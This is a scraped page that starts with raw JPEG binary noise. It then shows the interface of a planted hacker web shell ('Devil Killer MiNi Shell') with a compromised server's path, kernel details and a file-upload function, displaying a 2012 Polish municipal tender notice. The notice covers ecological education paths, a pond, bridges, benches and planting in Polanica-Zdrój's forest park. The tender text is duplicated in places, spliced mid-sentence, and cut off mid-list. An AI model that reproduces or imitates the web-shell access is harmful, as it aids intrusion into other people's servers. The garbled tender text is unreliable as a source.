JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120420/127668-N-2012.html

<p class="kh_header"><b>Polanica-Zdrój: Budowa ścieżek edukacji ekologicznej na terenie Parku Leśnego w Polanicy Zdroju
 roboty budowlane</b><br>
<b>Numer ogłoszenia: 127668 - 2012; data zamieszczenia: 20.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Polanica-Zdrój , ul. Dąbrowskiego 3, 57-320 Polanica-Zdrój, woj. dolnośląskie, tel. 074 8680600, faks 0-74 86 810 46.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polanica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ścieżek edukacji ekologicznej na terenie Parku Leśnego w Polanicy Zdroju
 roboty budowlane.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja inwestycji została podzielona na następujące zadania: 
1)roboty przygotowawcze 
2)wykonanie ciągów pieszych 
3)wykonanie zbiornika (oczka) wodnego, 
4)elementy małej architektury 
5)wykonanie oraz montaż tablic edukacyjnych 
6)zieleń  nasadzenia (wydatek niekwalifikowany). 
1. Roboty przygotowawcze przed wykonaniem ciągów pieszych 
Roboty przygotowawcze, które należy wykonać przed przystąpieniem do realizacji części projektu związanej z budową ciągów pieszych obejmują: 
1)rozbiórkę ręczną nawierzchni z piaskowca na ścieżkach o szerokości 1,2m, 
2)rozbiórkę nawierzchni z piaskowca na ścieżkach spacerowych o szerokości 2,5m i 2,0m, dopuszcza się prowadzenie prac przy użyciu minikoparki o wadze do 2 ton. 
2. Roboty przygotowawcze przed wykonaniem elementów małej architektury 
Roboty przygotowawcze, które należy wykonać przed przystąpieniem do realizacji części projektu związanej z montażem małej architektury obejmują: 
1)demontaż i wywóz istniejących ławek (5szt.), 
2)demontaż i wywóz istniejących koszy na śmieci (5szt.), 
 Uwagi: Wykonawca zobowiązany jest do przekazania Zamawiającemu zdemontowanych urządzeń i przewiezienia ich na teren bazy MZK , przy ul. Polnej w Polanica-Zdroju.
3)demontaż metalowych barierek istniejących mostków. 
3. Roboty przygotowawcze przed wykonaniem i montażem tablic edukacyjnych 
Roboty przygotowawcze, które należy wykonać przed przystąpieniem do realizacji części projektu związanej z montażem tablic edukacyjnych obejmują: 
1) demontaż i wywóz istniejących tablic edukacyjnych (3 szt.) 
Uwagi: Tablice muszą być demontowane tak, aby nie zostały uszkodzone, a następnie winne być przewiezione na teren bazy MZK , przy ul. Polnej w Polanica Zdroju.
4. Roboty przygotowawcze przed wykonaniem nasadzeń 
Roboty przygotowawcze, które należy wykonać przed przystąpieniem do realizacji części projektu związanej z nasadzeniami zieleni, obejmują: 
1)wywóz gruzu z terenu parku: 
a)elementy betonowe o wymiarach około 50cmx50cm, oraz płyt betonowych o kształtach regularnych (z nad rowu) około 10 20szt., 
b)pogłębienie rowu na ? długości  70m 
c)zebranie śmieci, 
d)wywiezieni połamanych i pociętych konarów i liści, 
e)uporządkowanie kwater regularnych od strony ul. Chrobrego (do rowu)  pow. około 2500 m2, 
f)grabienie, usunięcie jeżyn, wywiezienie śmieci oraz usuniętych jeżyn i zagrabionych liści, zabezpieczenie zieleni istniejącej wynikające z planu ochrony drzew, wywiezienie połamanych konarów i gałęzi wywiezienie liści wygrabionych z wybranych powierzchni rabat (powierzchnia do wygrabienia podana w tabeli nr 8), przeprowadzenie pielęgnacji drzew, według wykazu i wytycznych zawartych w tabeli 1. 
Technologia wykonywania ciągów pieszych 
1)wykorytować pas pod ścieżki główne o szer. 2,0 m oraz ścieżki boczne 1,2 m, 1,5 m;
2)wybrać kamienie i humus do gruntu rodzimego, nie wycinać centralnych korzeni drzew. Korzenie muszą być ukryte w warstwie wyrównawczej z pospółki lub w warstwie odsączającej; 
3)koryto zasypać pospółką do wysokości 10 cm poniżej górnego poziomu korzeni; 
4)ułożyć geowłókninę w warstwie wyrównawczej; 
5)wykonać warstwę odsączającą (mrozoodporną) z kruszywa łamanego asortymentu fi 031,5 mm; 
6)ułożyć obrzeża z piaskowca nie gorszego niż piaskowiec Radków na betonie klasy C12 15 (wilgotnym). Frakcja kruszywa max. 8 mm. Obrzeża zlicowane z płaszczyzną ścieżki; 
7)pod płytami z piaskowca grubość warstwy betonu 5 cm (w zależności od kształtu płyt kamiennych w kolorze piaskowym) (beton klasy C12,15, wilgotny);
8)po ułożeniu kamienia spoiny wypełnić grysem z piaskowca;
9)nadać ścieżce 2% spadki poprzeczne w jednym kierunku; 
10)w miejscach wyniesienia ścieżki ponad teren po obu jej bokach usypać skarpy (stopień nachylenia skarp nie większy niż 35 stopni). 
Prace na ścieżkach należy wykonywać minikoparką o wadze do 2 ton o małym nacisku na gąsienice (z wyjątkiem odcinków w bezpośrednim sąsiedztwie dużych drzew, gdzie prace n7 
Oczko wodne  główne założenia projektowe 
W ramach projektu wykonawczego Budowa ścieżek edukacji ekologicznej na terenie Parku Leśnego w Polanicy Zdroju zakłada się wykonanie zbiornika (oczka) wodnego w sąsiedztwie rzeźby Niedźwiedzia, w celu podniesienia walorów kompozycyjnych tego fragmentu parku. Prace związane z wykonaniem oczka wodnego obejmują: 
a)prace przygotowawcze (wykopanie oczka, wyczyszczenie terenu z korzeni, kamieni i głazów, wyrównanie terenu), 
b)prace budowlano-konstrukcyjne, 
c)prace instalacyjne (w tym instalacje wodno kanalizacyjne i elektryczne), 
d)prace w zakresie zieleni (nowe nasadzenia). 
W ramach budowy oczka przewiduje się wykonanie: 
a)niecki oczka; 
b)dwóch wysp; 
c)obrzeży oczka (skarp) z dwoma kaskadami wykonanymi z głazów kamiennych ( miejsca oznaczone w projekcie jako NW i PK); 
d)dwóch mostków o konstrukcji z drewna klejonego; 
e)aranżacji oczka; 
f)nawierzchni wokół oczka i na wyspach (opisane w Części 2 dokumentacji pt. Ciągi piesze). 
Obecnie teren projektowanego zbiornika (oczka) wodnego znajduje się na obszarze ze spadkiem w stronę południowo wschodnią (396,5  296,0) Zaleca się wyrównanie placyku wokół oczka do poziomu 396,5. Wzdłuż południowo-zachodniego obrzeża planowanego zbiornika znajduje się stroma skarpa. 
Przy wytyczaniu brzegu oczka należy uwzględnić utworzenie zakoli o dnie poniżej lustra wody około 20 cm. Głębokość oczka zaprojektowano od 30 cm do 45 cm ze spadkiem dna w kierunku przelewu i spustu dennego. Ściany oczka wodnego zaprojektowane zostały pod kątem 30  60o w celu ochrony przed naprężeniami konstrukcji spowodowanymi zamarzającą wodą. Obrzeża zbiornika tworzą skarpy ziemne o szerokości 30 cm ze spadkiem 2% w stronę niecki oczka. Projektowane na oczku wyspy różnią się poziomem  wyspa z mostkami ma poziom 396,0 m, natomiast druga wyspa ma poziom 395,8 m. Na wyspie z mostkami poprowadzona została ścieżka o nawierzchni z piaskowca (szerokość 1,5m). Poziom lustra wody wynosi 395,0 m. 
W terenie, gdzie będzie zlokalizowany zbiornik wodny (oczko), obserwuje się okresowe gromadzenie i napływ wody. W projekcie zakłada się, że napływ wody będzie występował również po wykonaniu oczka i jego miejsce oznaczono na rysunku NW. W miejscu tym należy ukształtować kamienną kaskadę (patrz punkt technologia wykonania kaskady). 
W celu zapobieżenia wysychaniu oczka zaprojektowano podłączenie wody miejskiej z ul. Bolesława Chrobrego do studzienki PS zaopatrzonej w wodomierz Js 20. 
W celu ograniczenia pobierania wody z wodociągu zaprojektowano ujęcie brzegowe wody UW w rowie melioracyjnym (rejon ul. Bolesława Chrobrego). Ujęcie UW należy obudować, wlot zabezpieczyć kratą. 

Przelew wody z oczka i spust zaprojektowano w najniższym punkcie oczka oznaczonym na rysunku jako PS. 
W zagłębieniu oczka wodnego, przewidziano umieszczenie pompy umożliwiającej utrzymanie wody w obiegu zamkniętym. Wypływ wody z pompy umiejscowiono w górnym poziomie skarpy, z kaskadowym ujściem wody po skarpie do oczka (miejsce oznaczone na rysunkach jako PK) (patrz punkt technologia wykonania kaskady). 
Aranżacja oczka wodnego 
Projekt zakłada wykonanie aranżacji otoczenia oczka, dna, półki oraz skarp i wysp z piaskowca (materiał nie gorszy niż Radków). Do wykonania tej aranżacji, w tym dwóch kaskad, należy zastosować nieregularny kamień łamany (o wymiarach około szer. 20 dł. 30 cm gr. od 10 cm do 30 cm)  i głazy (o wymiarach w najszerszym miejscu od 50 do 80 cm  patrz. fot.3 i fot. 4). Kolorystyka kamienia jak na ścieżkach (bez odcieni czerwonych). Większe szczeliny między kamieniem łamanym, jak i głazami należy wypełnić gresem z piaskowca (a ziemią urodzajną w miejscu planowanych nasadzeń). Całość aranżacji uzupełnić nasadzeniami zieleni (wg projektu zieleni). 
Aranżacja kamieni i zieleni terenu zbiornika wodnego (oczka) ma nadać tej przestrzeni naturalny charakter. Kamień łamany, głazy i zieleń mają zamaskować betonową konstrukcję oczka wodnego. 
Bilans oczka wodnego 
1)powierzchnia całkowita - skarpy + niecka zbiornika + wyspy 191,3 m2 
2)wyspa z mostkami 14m2 
3)wyspa bez mostków 19,5m2 
4)długość obrzeża oczka wodnego wieńca 47m 
5)powierzchnia konstrukcji z siatkobetonu należy wykonać ręcznie). Ręcznie należy wybrać humus spomiędzy korzeni drzew.
Przelew wody z oczka i spust zaprojektowano w najniższym punkcie oczka oznaczonym na rysunku jako PS. 
W zagłębieniu oczka wodnego, przewidziano umieszczenie pompy umożliwiającej utrzymanie wody w obiegu zamkniętym. Wypływ wody z pompy umiejscowiono w górnym poziomie skarpy, z kaskadowym ujściem wody po skarpie do oczka (miejsce oznaczone na rysunkach jako PK) (patrz punkt technologia wykonania kaskady). 
Aranżacja oczka wodnego 
Projekt zakłada wykonanie aranżacji otoczenia oczka, dna, półki oraz skarp i wysp z piaskowca (materiał nie gorszy niż Radków). Do wykonania tej aranżacji, w tym dwóch kaskad, należy zastosować nieregularny kamień łamany (o wymiarach około szer. 20 dł. 30 cm gr. od 10 cm do 30 cm) i głazy (o wymiarach w najszerszym miejscu od 50 do 80 cm - patrz. fot.3 i fot. 4). Kolorystyka kamienia jak na ścieżkach: szary łamany beżem i żółcią (bez odcieni czerwonych). Większe szczeliny między kamieniem łamanym, jak i głazami należy wypełnić gresem z piaskowca (a ziemią urodzajną w miejscu planowanych nasadzeń). Całość aranżacji uzupełnić nasadzeniami zieleni (wg projektu zieleni). 
Aranżacja kamieni i zieleni terenu zbiornika wodnego (oczka) ma nadać tej przestrzeni naturalny charakter. Kamień łamany, głazy i zieleń mają zamaskować betonową konstrukcję oczka wodnego. 
Bilans oczka wodnego 
1)powierzchnia całkowita - skarpy + niecka zbiornika + wyspy 191,3 m2 
2)wyspa z mostkami 14m2 
3)wyspa bez mostków 19,5m2 
4)długość obrzeża oczka wodnego wieńca 47m 
5)powierzchnia konstrukcji z siatkobetonu należy wykonać ręcznie). Ręcznie należy wybrać humus spomiędzy korzeni drzew.
Mostki 
Na terenie Parku Leśnego w Polanicy-Zdroju zaplanowano dwa nowe mostki drewniane oznaczone na rysunkach jako M1 i M2. Przewiduje się ponadto prace na mostkach istniejących oznaczonych jako M3 i M4, polegające na: 
a)remoncie obrzeży na mostku M3 (obłożenie płytami kamiennymi piaskowca) 
b)demontażu istniejącej barierki na mostku M4 ; 
c)wykonaniu jednej nowej balustrady na mostku M3 i dwóch nowych balustrad na mostku M4. 
d)Kolorystykę mostków należy dostosować do kolorystyki ławek i koszy na śmieci, drewno pomalować lakierobejcą na kolor ciemny orzech. 
Mostki nowoprojektowane  M1 i M2 
Oba mostki pełnią funkcję komunikacyjną pomiędzy terenem parku a wyspą zlokalizowaną na projektowanym oczku wodnym.
Mostek M1
Długość: 300 cm 
Szerokość całkowita: 170 cm
Szerokość użytkowa: 150 cm
Mostek M2
Długość: 290 cm
Szerokość całkowita: 170 cm
Szerokość użytkowa: 150 cm
Mostki istniejące - M3 i M4 
Oba mostki zlokalizowane są od strony ulicy Bolesława Chrobrego. 
Mostek M3  położony jest przy wejściu prowadzącym do kamienia pamiątkowego. Mostek tworzy żelbetowy przepust. 
Zakłada się wykonanie jednej balustrady z drewna klejonego liściastego (buk) i zamontowanie jej na obrzeżu bezpośrednio przy ścieżce. 
Parametry balustrady: 
a)wysokość 1,10 m 
b)słupki o przekroju 10 x 10 cm, wysokości: 100 cm  konstrukcyjne oraz o wysokości: 65 cm - dekoracyjne, 
c)pochwyt (element prosty) o przekroju 10 x 10 cm, mocowany do słupków za pomocą czopów, 
d)stężenie balustrady (element prosty)  deski podwójne (pełniące funkcję kleszczy) o przekroju 3,4 x 10 cm, mocowane do słupków za pomocą nakładek, dodatkowo wzmocnione śrubami. 

Ławki i kosze na śmieci 
Ławki 
Na terenie opracowania przewiduje się montaż 14 ławek o konstrukcji z profili stalowych, malowanych proszkowo na kolor ciemny grafit lub czarny (matowy) o następujących parametrach: 
Parametry ławki 
a)wysokość całkowita 85 cm 
b)wysokość siedziska 44 cm 
c)długość 170 cm lub 200 cm 
d)szerokość całkowita 54,5 cm 
e)waga około 50 kg 
f)grubość listew drewnianych 4 cm (kolor orzech) 
g)profil stalowy 50 x 50 x 2 mm 
Ławki mają być na stałe zabetonowane w gruncie. Umiejscowione wzdłuż ścieżek na nawierzchni z piaskowca. 
Kosze na śmieci 
Na terenie opracowania przewiduje się montaż 7 koszy na śmieci. Kosze mają być zamontowane na stałe poprzez zabetonowanie w gruncie. Kosze powinny być zlokalizowane w sąsiedztwie ławek (zgodnie z rysunkiem 41). Obudowa koszy: listwy z drewna iglastego (kolor orzech), pokryte lakierobejcą i stal ocynkowana malowana proszkowo 

Tablice edukacyjne i informacyjne 
Projekt ścieżki edukacji ekologicznej zakłada umieszczenie na jej przebiegu tablic informacyjnych i edukacyjnych oraz gabloty z przekrojami pni drzew. 

TABLICA INFORMACYJNA NR 1 Park Leśny Polanica Zdrój (ul. Cicha) 
TABLICA INFORMACYJNA NR 2 Park Leśny Polanica Zdrój (ul. Bolesława Chrobrego) 
TABLICA EDUKACYJNA NR 3 Rośliny zielne objęte ochroną 
TABLICA NR 4 Świerk pospolity 
TABLICA NR 5 Klon jawor 
TABLICA NR 6 Drugie życie drzew 
TABLICA NR 7 Modrzew europejski 
TABLICA NR 8 Olsza czarna 
TABLICA NR 9 Jesion wyniosły 
TABLICA NR 10 Dąb bezszypułkowy 
TABLICA NR 11 Zmienność plastyczna roślin drzewiastych 
TABLICA NR 12 Struktura warstwowa i funkcje lasu 
TABLICA NR 13 Funkcje roślin drzewiastych 
TABLICA 14 Rośliny drzewiaste objęte ochroną 
TABLICA NR 15 Sosna pospolita 
TABLICA NR 16 Typy roślin drzewiastych 
TABLICA NR 17 Budowa drzewa 
TABLICA NR 18 Buk pospolity 
TABLICA NR 19 Klon pospolity 
TABLICA NR 20 Ptasi budzik 
TABLICA NR 21 Polanicki niedźwiadek 
TABLICA NR 22 Polanicki niedźwiadek - ulotka 
TABLICA NR 23 Ścieżka edukacyjna Park Leśny Polanica-Zdrój - ulotka 
TABLICA NR 24 Ekosystem wodny - ulotka ciemny grafit lub czarny.

Opis techniczny tablic edukacyjnych i gabloty 
Tablice
Projektowane tablice edukacyjne i informacyjne składają się ze stelaży oraz powierzchni ekspozycyjnych, na których zostaną nadrukowane projekt graficzne będący przedmiotem niniejszego opracowania. Wymiary projektowanych tablic edukacyjnych i informacyjnych przedstawia rysunek 5.1. 
Parametry powierzchni ekspozycyjnej: 
1)wymiary 100 cm x 70 cm, 
2)materiał: ebonit, 
3)zabezpieczenie przed oddziaływaniem czynników atmosferycznych, 
4 zabezpieczona powłoką antygraffiti i UV. 
Parametry wydruku: 
Projekt graficzny musi zostać nadrukowany na powierzchni ekspozycyjnej według następujących wytycznych: 
1)druk solventowy, 
2)wykonywany metodą, która umożliwia brak widocznych przejść głowicy, 
3)rozdzielczość min. 900 dpi., 
4)stopień pokrycia tablicy kolorem 100%. 
Przed przystąpieniem do nadruku projektów graficznych na powierzchniach ekspozycyjnych należy wykonać wydruk próbny fragmentów tablic (zawierający elementy takie jak: fotografie, grafika, tekst, tło) nadrukowane na materiał identyczny z materiałem, z którego będą wykonane tablice. Wydruk próbny musi zostać przedstawiony Inwestorowi do zatwierdzenia. 
Parametry stelażu 
Projektuje się stelaż z profili stalowych 60 x 60 x 5 mm malowanych proszkowo na kolor ciemny grafit  czarny (matowy), połączonych kątownikami stalowymi (kolor ten sam co stelażu). Podstawowe wymiary stelażu h = 190 cm, szer. = 70 cm. Stelaż ma być zakotwiony w fundamencie betonowym o wymiarach h = 80 cm, szer. = 30 cm (beton C 20/25)
Gabloty 
Projektowana gablota składa się ze stelażu i powierzchni ekspozycyjnej zamykanej (za szybą). Podstawowe wymiary gabloty: szer. = 134 cm, h = 210 cm. 
Powierzchnia ekspozycyjna gabloty wynosi szer. = 100 cm na h = 70 cm. 
Stelaż należy wykonać z profili stalowych ocynkowanych malowanych proszkowo na kolor ciemny grafit / czarny (matowy) 60 x 60 x 5 mm. Stelaż ma być zakotwiony w fundamencie betonowym o wymiarach h = 80 cm, szer. = 30 cm (beton C 20 25) (wg rysunku 5.2). 
W gablocie zostaną umieszczone przekroje poprzeczne pni drzew - gatunków według wykazu. 
Zieleń  
Prace przy realizacji zieleni należy powierzyć specjalistycznej firmie posiadającej odpowiednie doświadczenie i kwalifikacje. 
Prace ziemne 
1)należy unikać zagęszczenia podłoża, powodującego uszkodzenia struktury gleby, na obszarach przeznaczonych do uprawy i sadzenia roślin (zagęszczenie podłoża wpływa negatywnie na wzrost roślin i odprowadzanie wody). 
2)Rośliny powinny być sadzone do podłoża o naturalnym układzie poziomów glebowych. 
3)Prace ziemne powinny być prowadzone jedynie wtedy, gdy warunki atmosferyczne na to zezwalają (najwyżej lekki przymrozek). 
4)Planując szerszy zakres prac ziemnych, należy wcześniej przeprowadzić analizę tekstury gleby oraz jej suchej masy. 

Wykonawca ma obowiązek w formie pisemnej i graficznej przedstawić Zleceniodawcy, lokalizację stref składowania materiałów budowlanych. Strefy składowania materiałów budowlanych muszą być w terenie wydzielone np. za pomocą taśmy lub siatki. 
Wykonawca ma obowiązek w formie schematycznego rysunku określić strefy poruszania się sprzętu mechanicznego na terenie prowadzonej inwestycji. 
Zobowiązuje się Wykonawcę do wcześniejszego określenia stref prac ręcznych wykopów w bezpośrednim sąsiedztwie drzew. 
Zobowiązuje się głównego Wykonawcę do przeprowadzenia szkolenia podwykonawców - w zakresie obowiązujących zasad ochrony drzew i systemów korzeniowych na terenie prowadzonej inwestycji. 

Opis planowanych prac porządkowych (część 1  roboty przygotowawcze) 
Przed przystąpieniem do prac związanych z realizacją nasadzeń, należy przeprowadzić następujące prace przygotowawcze: 
1)wywóz gruzu z terenu parku: elementy betonowe o wymiarach około 50cmx50cm, oraz płyt betonowych o kształtach regularnych (z nad rowu) około 1020szt.,
2)pogłębienie rowu na ? długości  70m 
3)zebranie śmieci,
4)wywiezieni połamanych i pociętych konarów i liści, 
5)uporządkowanie kwater regularnych od strony ul. Chrobrego (do rowu)  pow. około 1500 m2, 
Nasadzenia
1)sadzenie drzew liściastych form naturalnych z zaprawieniem całkowitym dołów o średnicy i głębokości :1,0/0,7 m (drzewa o bryle korzeniowej >m)  16 szt.,
2)sadzenie drzew iglastych z zaprawieniem całkowitym dołów o średnicy i głębokości :1,0/0,7 m (drzewa o bryle korzeniowej >m) 4 szt.,
3)sadzenie drzew liściastych form naturalnych z zaprawieniem do połowy głębokości dołów o średnicy i głębokości 0,7 m (sadzenie roślin o wysokości do 120 cm) 201szt
4)Obsadzenie kwietników bylinami; przy ilości 9szt m2 (sadzenie Wrzosu pospolitego)  88, 9 m2,
5)Obsadzenie kwietników bylinami , przy ilości 5szt/ m2 (sadzenie Róż alpejskich),
6)Sadzenie krzewów iglastych, z zaprawieniem ziemią dołów o średnicy i głębokości: 1, 0 0, 7 m  214 szt., 
7)Obsadzenie kwietników bylinami; przy ilości 9szt, m2  173, 33 m2,
8)Obsadzenie kwietników bylinami; przy ilości 16szt, m2  44, 38 m2,
9)Obsadzenie kwietników bylinami; przy ilości 1szt m2  50, 00 szt.,
10)Obsadzenie kwietników bylinami; przy ilości 5szt m2  24, 00 m2,
11)Wykonanie obrzeży rabatowych z tworzyw sztucznych  370, 00 m,
12)Przygotowanie terenu pod obsadzenia wraz z oczyszczeniem terenu i uzupełnieniem gleby rodzimej warstwa ziemi żyznej  lub kompostowej, o gr. 5 cm (renowacja runa)  1500, 00 m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.11-2, 45.00.00.00-7, 45.10.00.00-8, 45.23.30.00-9, 45.30.00.00-8, 45.32.00.00-6, 45.26.21.00-2, 45.10.00.00-8, 45.26.50.00-6, 45.26.00.00-7, 45.33.23.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wadium należy wnieść w wysokości 35.000,0  zł  PLN (słownie: trzydzieści pięć tysięcy złotych, 00,100 groszy) PLN w terminie do dnia 8.05.2012r. do godziny 10:00. 
2. Wadium może być wnoszone:
1) w pieniądzu  przelewem na konto depozytowe Gminy PolanicaZdrój BANK PEKAO S.A. Oddział w PolanicyZdroju  nr 34 1240 3464 1111 0010 3997 8269 z dopiskiem 
Budowa ścieżek edukacji ekologicznej na terenie Parku Leśnego w Polanicy Zdroju.
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej
(z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
 Uwagi: gwarancje w oryginale mają być pozostawione w kasie Gminy PolanicaZdrój, natomiast kserokopie potwierdzone ze zgodnością z oryginałem załączone do ofert.

3. Wadium może być wniesione w jednej lub kilku formach.
4. W przypadku, gdy wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji
ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać:
1) zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie zamawiającego (beneficjenta gwarancji) zawierające oświadczenie, że zaistniały okoliczności, o których mowa w pkt 7 bez potwierdzania tych okoliczności,
2) termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą,
3) miejsce i termin zwrotu gwarancji.
5. Wadium wniesione w pieniądzu zamawiający przechowa na rachunku bankowym.
6. Wykonawca, który nie zabezpieczy swojej oferty akceptowaną formą wadium zostanie
przez zamawiającego wykluczony a jego oferta odrzucona.
7. Zamawiający zatrzymuje wadium wraz z odsetkami w sytuacji, gdy:
1) wykonawca, którego oferta została wybrana:
